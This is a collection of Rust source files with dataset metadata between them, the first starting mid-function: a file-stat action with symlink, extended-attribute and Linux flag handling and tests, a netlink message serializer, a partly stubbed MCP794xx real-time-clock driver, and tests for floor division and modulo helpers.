std::io::Result<std::borrow::Cow<PathBuf>> { use std::borrow::Cow::*; if self.follow_symlink { self.path.canonicalize().map(Owned) } else { Ok(Borrowed(&self.path)) } } } /// A response type for the stat action. #[derive(Debug)] pub struct Response { /// A path to the file that the result corresponds to. path: PathBuf, /// Metadata about the file. metadata: Metadata, /// A path to the pointed file (in case of a symlink). symlink: Option<PathBuf>, /// Extended attributes of the file. ext_attrs: Vec<ospect::fs::ExtAttr>, /// Additional Linux-specific file flags. #[cfg(target_os = "linux")] flags_linux: Option<u32>, // TODO: Add support for collecting file flags on macOS. } /// An error type for failures that can occur during the stat action. #[derive(Debug)] enum Error { /// A failure occurred during the attempt to collect file metadata. Metadata(std::io::Error), } impl std::error::Error for Error { fn source(&self) -> Option<&(dyn std::error::Error + 'static)> { use Error::*; match *self { Metadata(ref error) => Some(error), } } } impl std::fmt::Display for Error { fn fmt(&self, fmt: &mut std::fmt::Formatter) -> std::fmt::Result { use Error::*; match *self { Metadata(ref error) => { write!(fmt, "unable to collect metadata: {}", error) } } } } impl From<Error> for session::Error { fn from(error: Error) -> session::Error { session::Error::action(error) } } /// Handles requests for the file stat action. pub fn handle<S>(session: &mut S, request: Request) -> session::Result<()> where S: Session, { let metadata = if request.follow_symlink { std::fs::metadata(&request.path) } else { std::fs::symlink_metadata(&request.path) }.map_err(Error::Metadata)?; let symlink = if metadata.file_type().is_symlink() { ack! { std::fs::read_link(&request.path), warn: "failed to read symlink for '{}'", request.path.display() } } else { None }; let ext_attrs = if request.collect_ext_attrs { ext_attrs(&request) } else { vec!() }; #[cfg(target_os = "linux")] let flags_linux = if !metadata.file_type().is_symlink() { ack! { ospect::fs::linux::flags(&request.path), warn: "failed to collect flags for '{}'", request.path.display() } } else { // Flags are available only for non-symlinks. For symlinks, the function // would return flags mask for the target file, which can look confusing // in the results. None }; let response = Response { path: request.path, metadata: metadata, symlink: symlink, ext_attrs: ext_attrs, #[cfg(target_os = "linux")] flags_linux: flags_linux, }; session.reply(response)?; Ok(()) } impl crate::request::Args for Request { type Proto = rrg_proto::jobs::GetFileStatRequest; fn from_proto(mut proto: Self::Proto) -> Result<Self, crate::request::ParseArgsError> { let path = proto.take_pathspec().try_into() .map_err(|error| { crate::request::ParseArgsError::invalid_field("pathspec", error) })?; Ok(Request { path: path, follow_symlink: proto.get_follow_symlink(), collect_ext_attrs: proto.get_collect_ext_attrs(), }) } } impl crate::response::Item for Response { type Proto = rrg_proto::jobs::StatEntry; fn into_proto(self) -> Self::Proto { use rrg_proto::convert::FromLossy as _; let mut proto = rrg_proto::jobs::StatEntry::from_lossy(self.metadata); proto.set_pathspec(self.path.into()); if let Some(symlink) = self.symlink { proto.set_symlink(symlink.to_string_lossy().into_owned()); } proto.set_ext_attrs(self.ext_attrs.into_iter().map(Into::into).collect()); #[cfg(target_os = "linux")] if let Some(flags_linux) = self.flags_linux { proto.set_st_flags_linux(flags_linux); } proto } } /// Collects extended attributes of a file specified by the request. fn ext_attrs(request: &Request) -> Vec<ospect::fs::ExtAttr> { let path = match request.target() { Ok(path) => path, Err(error) => { rrg_macro::warn! { "failed to expand '{path}': {cause}", path = request.path.display(), cause = error }; return vec!(); } }; let ext_attrs = match ospect::fs::ext_attrs(&path) { Ok(ext_attrs) => ext_attrs, Err(error) => { rrg_macro::warn! { "failed to collect extended attributes for '{path}': {cause}", path = request.path.display(), cause = error }; return vec!(); } }; ext_attrs.filter_map(|ext_attr| match ext_attr { Ok(ext_attr) => Some(ext_attr), Err(error) => { rrg_macro::warn! { "failed to collect an extended attribute for '{path}': {cause}", path = request.path.display(), cause = error }; None } }).collect() } #[cfg(test)] mod tests { use std::fs::File; use super::*; #[test] fn test_handle_with_non_existent_file() { let tempdir = tempfile::tempdir().unwrap(); let request = Request { path: tempdir.path().join("foo").to_path_buf(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_err()); } #[test] fn test_handle_with_regular_file() { let tempdir = tempfile::tempdir().unwrap(); File::create(tempdir.path().join("foo")).unwrap(); let request = Request { path: tempdir.path().join("foo").to_path_buf(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, tempdir.path().join("foo")); assert!(reply.metadata.is_file()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_link() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); let request = Request { path: symlink.clone(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink); assert_eq!(reply.symlink, Some(target)); assert!(reply.metadata.file_type().is_symlink()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_two_links() { use std::os::unix::fs::symlink; let tempdir = tempfile::tempdir().unwrap(); let symlink_to_symlink = tempdir.path().join("foo"); let symlink_to_target = tempdir.path().join("bar"); let target = tempdir.path().join("baz"); File::create(&target).unwrap(); symlink(&target, &symlink_to_target).unwrap(); symlink(&symlink_to_target, &symlink_to_symlink).unwrap(); let request = Request { path: symlink_to_symlink.clone(), follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink_to_symlink); assert_eq!(reply.symlink, Some(symlink_to_target)); assert!(reply.metadata.file_type().is_symlink()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_link_and_follow_symlink() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); let request = Request { path: symlink.clone(), follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink); assert_eq!(reply.symlink, None); assert!(reply.metadata.is_file()); } // Symlinking is supported only on Unix-like systems. #[cfg(target_family = "unix")] #[test] fn test_handle_with_two_links_and_follow_symlink() { use std::os::unix::fs::symlink; let tempdir = tempfile::tempdir().unwrap(); let symlink_to_symlink = tempdir.path().join("foo"); let symlink_to_target = tempdir.path().join("bar"); let target = tempdir.path().join("baz"); File::create(&target).unwrap(); symlink(&target, &symlink_to_target).unwrap(); symlink(&symlink_to_target, &symlink_to_symlink).unwrap(); let request = Request { path: symlink_to_symlink.clone(), follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); let reply = session.reply::<Response>(0); assert_eq!(reply.path, symlink_to_symlink); assert_eq!(reply.symlink, None); assert!(reply.metadata.is_file()); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_file_ext_attrs_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let tempfile = tempdir.path().join("foo"); std::fs::File::create(&tempfile).unwrap(); assert! { std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg(&tempfile) .status() .unwrap() .success() }; let request = Request { path: tempfile.clone(), follow_symlink: false, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.ext_attrs.len(), 1); assert_eq!(reply.ext_attrs[0].name, "user.norf"); assert_eq!(reply.ext_attrs[0].value, b"quux"); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_symlink_ext_attrs_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); // Turns out, the kernel disallows setting extended attributes on a // symlink [1]. However, the kernel itself can hypothetically set such // bits. // // In order to verify that we really collect attributes for the symlink // and no for the target, we set some attributes for the target and then // we collect attributes of the symlink. Then, the expected result is to // have a reply with no extended attributes. // // [1]: https://man7.org/linux/man-pages/man7/xattr.7.html assert! { std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg("--no-dereference") .arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: false, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert!(reply.ext_attrs.is_empty()); } #[cfg(all(target_os = "linux", feature = "test-setfattr"))] #[test] fn test_handle_with_symlink_ext_attrs_and_follow_symlink_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("setfattr") .arg("--name").arg("user.norf") .arg("--value").arg("quux") .arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink.clone(), follow_symlink: true, collect_ext_attrs: true, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.ext_attrs.len(), 1); assert_eq!(reply.ext_attrs[0].name, "user.norf"); assert_eq!(reply.ext_attrs[0].value, b"quux"); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_file_flags_on_linux() { // https://elixir.bootlin.com/linux/v5.8.14/source/include/uapi/linux/fs.h#L245 const FS_NOATIME_FL: std::os::raw::c_long = 0x00000080; let tempdir = tempfile::tempdir().unwrap(); let tempfile = tempdir.path().join("foo"); std::fs::File::create(&tempfile).unwrap(); assert! { std::process::Command::new("chattr") .arg("+A").arg(&tempfile) .status() .unwrap() .success() }; let request = Request { path: tempfile, follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); let flags = reply.flags_linux.unwrap(); assert_eq!(flags & FS_NOATIME_FL as u32, FS_NOATIME_FL as u32); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_symlink_flags_on_linux() { let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("chattr") .arg("+d").arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: false, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); assert_eq!(reply.flags_linux, None); } #[cfg(all(target_os = "linux", feature = "test-chattr"))] #[test] fn test_handle_with_symlink_flags_and_follow_symlink_on_linux() { // https://elixir.bootlin.com/linux/v5.8.14/source/include/uapi/linux/fs.h#L245 const FS_NODUMP_FL: std::os::raw::c_long = 0x00000040; let tempdir = tempfile::tempdir().unwrap(); let symlink = tempdir.path().join("foo"); let target = tempdir.path().join("bar"); std::fs::File::create(&target).unwrap(); std::os::unix::fs::symlink(&target, &symlink).unwrap(); assert! { std::process::Command::new("chattr") .arg("+d").arg(&target) .status() .unwrap() .success() }; let request = Request { path: symlink, follow_symlink: true, collect_ext_attrs: false, }; let mut session = session::FakeSession::new(); assert!(handle(&mut session, request).is_ok()); assert_eq!(session.reply_count(), 1); let reply = session.reply::<Response>(0); let flags = reply.flags_linux.unwrap(); assert_eq!(flags & FS_NODUMP_FL as u32, FS_NODUMP_FL as u32); } }
true
3a23873497097fb9f4d6918b8c4988a4fda4203c
Rust
shun159/vr_types
/src/netlink/message.rs
UTF-8
2,602
2.5625
3
[ "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
use super::raw::{nlmsghdr, NLMSG_LENGTH}; use super::Serialize; use crate::genetlink::GenericNetlinkMessage; use netlink_sys::Socket; use std::process; use zerocopy::LayoutVerified; #[derive(Debug)] pub struct NetlinkMessage<P> { pub ty: u16, pub flags: u16, pub seq: u32, pub pid: u32, pub payload: P, } impl<P: Serialize> NetlinkMessage<P> { pub fn new(ty: u16, flags: u16, payload: P) -> NetlinkMessage<P> { NetlinkMessage { ty: ty, flags: flags, seq: 0, pid: process::id(), payload: payload, } } pub fn send_nl(&self, socket: &Socket) { let mut buffer = [0; 1000]; let byte_size = self.len() as usize; self.serialize(&mut buffer[..byte_size]); socket.send(&buffer[..byte_size], 0).unwrap(); } // Generic NETLINK message specfic shortcut fucntion pub fn recv_nl(socket: &Socket) -> NetlinkMessage<GenericNetlinkMessage<Vec<u8>>> { let mut buffer = [0; 1000]; let reply_len = socket.recv(&mut buffer, 0).unwrap(); let nl_msg = NetlinkMessage::deserialize(&buffer[..reply_len]); let genl_msg = GenericNetlinkMessage::deserialize(nl_msg.payload).unwrap(); NetlinkMessage::new( nl_msg.ty, nl_msg.flags, GenericNetlinkMessage::new( genl_msg.cmd, genl_msg.version, genl_msg.payload.to_vec(), ), ) } } impl<P: Serialize> Serialize for NetlinkMessage<P> { fn len(&self) -> u32 { NLMSG_LENGTH(self.payload.len()) } fn serialize(&self, buf: &mut [u8]) { let header_len = NLMSG_LENGTH(0) as usize; let (header, payload) = buf.split_at_mut(header_len); let mut header = LayoutVerified::<_, nlmsghdr>::new(header).expect("invalid buffer"); header.nlmsg_len = self.len(); header.nlmsg_type = self.ty; header.nlmsg_flags = self.flags; header.nlmsg_seq = self.seq; header.nlmsg_pid = self.pid; self.payload.serialize(payload); } } impl<'a> NetlinkMessage<&'a [u8]> { pub fn deserialize(buf: &'a [u8]) -> Self { let header_len = NLMSG_LENGTH(0) as usize; let (header, payload) = buf.split_at(header_len); let header = LayoutVerified::<_, nlmsghdr>::new(header).expect("invalid buffer"); Self { ty: header.nlmsg_type, flags: header.nlmsg_flags, seq: header.nlmsg_seq, pid: header.nlmsg_pid, payload, } } }
true
c4be8cdf17ed008d310934810155f374a3f96201
Rust
thejpster/mcp794xx-rs
/src/common/datetime.rs
UTF-8
2,811
2.65625
3
[ "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! Common date/time function use super::super::{BitFlags, DateTime, Error, Hours, Mcp794xx, Register, Rtcc}; use super::{decimal_to_packed_bcd, hours_from_register, hours_to_register, packed_bcd_to_decimal}; use interface; impl<DI, E> Rtcc for Mcp794xx<DI> where DI: interface::WriteData<Error = Error<E>> + interface::ReadData<Error = Error<E>>, { type Error = Error<E>; fn get_seconds(&mut self) -> Result<u8, Self::Error> { let seconds = self.iface.read_register(Register::SECONDS)?; let seconds = packed_bcd_to_decimal(seconds & !BitFlags::ST); Ok(seconds) } fn get_minutes(&mut self) -> Result<u8, Self::Error> { let minutes = self.iface.read_register(Register::MINUTES)?; Ok(packed_bcd_to_decimal(minutes)) } fn get_hours(&mut self) -> Result<Hours, Self::Error> { let data = self.iface.read_register(Register::HOURS)?; Ok(hours_from_register(data)) } fn get_weekday(&mut self) -> Result<u8, Self::Error> { Err(Error::InvalidInputData) } fn get_day(&mut self) -> Result<u8, Self::Error> { Err(Error::InvalidInputData) } fn get_month(&mut self) -> Result<u8, Self::Error> { Err(Error::InvalidInputData) } fn get_year(&mut self) -> Result<u16, Self::Error> { Err(Error::InvalidInputData) } fn set_seconds(&mut self, seconds: u8) -> Result<(), Self::Error> { Self::check_lt(seconds, 60)?; let seconds = decimal_to_packed_bcd(seconds); let value = if self.is_enabled { seconds | BitFlags::ST } else { seconds }; self.iface.write_register(Register::SECONDS, value) } fn set_minutes(&mut self, minutes: u8) -> Result<(), Self::Error> { Self::check_lt(minutes, 60)?; let minutes = decimal_to_packed_bcd(minutes); self.iface.write_register(Register::MINUTES, minutes) } fn set_hours(&mut self, hours: Hours) -> Result<(), Self::Error> { let value = hours_to_register(hours)?; self.iface.write_register(Register::HOURS, value) } fn set_weekday(&mut self, weekday: u8) -> Result<(), Self::Error> { Err(Error::InvalidInputData) } fn set_day(&mut self, day: u8) -> Result<(), Self::Error> { Err(Error::InvalidInputData) } fn set_month(&mut self, month: u8) -> Result<(), Self::Error> { Err(Error::InvalidInputData) } fn set_year(&mut self, year: u16) -> Result<(), Self::Error> { Err(Error::InvalidInputData) } fn get_datetime(&mut self) -> Result<DateTime, Self::Error> { Err(Error::InvalidInputData) } fn set_datetime(&mut self, datetime: &DateTime) -> Result<(), Self::Error> { Err(Error::InvalidInputData) } }
true
046fceba178613b5c001ae77cda1697cc31212da
Rust
marco-c/gecko-dev-comments-removed
/third_party/rust/chrono/src/div.rs
UTF-8
985
2.734375
3
[ "LicenseRef-scancode-unknown-license-reference", "MIT", "Apache-2.0" ]
permissive
pub use num_integer::{div_floor, div_mod_floor, div_rem, mod_floor}; #[cfg(test)] mod tests { use super::{div_mod_floor, mod_floor}; #[test] fn test_mod_floor() { assert_eq!(mod_floor(8, 3), 2); assert_eq!(mod_floor(8, -3), -1); assert_eq!(mod_floor(-8, 3), 1); assert_eq!(mod_floor(-8, -3), -2); assert_eq!(mod_floor(1, 2), 1); assert_eq!(mod_floor(1, -2), -1); assert_eq!(mod_floor(-1, 2), 1); assert_eq!(mod_floor(-1, -2), -1); } #[test] fn test_div_mod_floor() { assert_eq!(div_mod_floor(8, 3), (2, 2)); assert_eq!(div_mod_floor(8, -3), (-3, -1)); assert_eq!(div_mod_floor(-8, 3), (-3, 1)); assert_eq!(div_mod_floor(-8, -3), (2, -2)); assert_eq!(div_mod_floor(1, 2), (0, 1)); assert_eq!(div_mod_floor(1, -2), (-1, -1)); assert_eq!(div_mod_floor(-1, 2), (-1, 1)); assert_eq!(div_mod_floor(-1, -2), (0, -1)); } }
true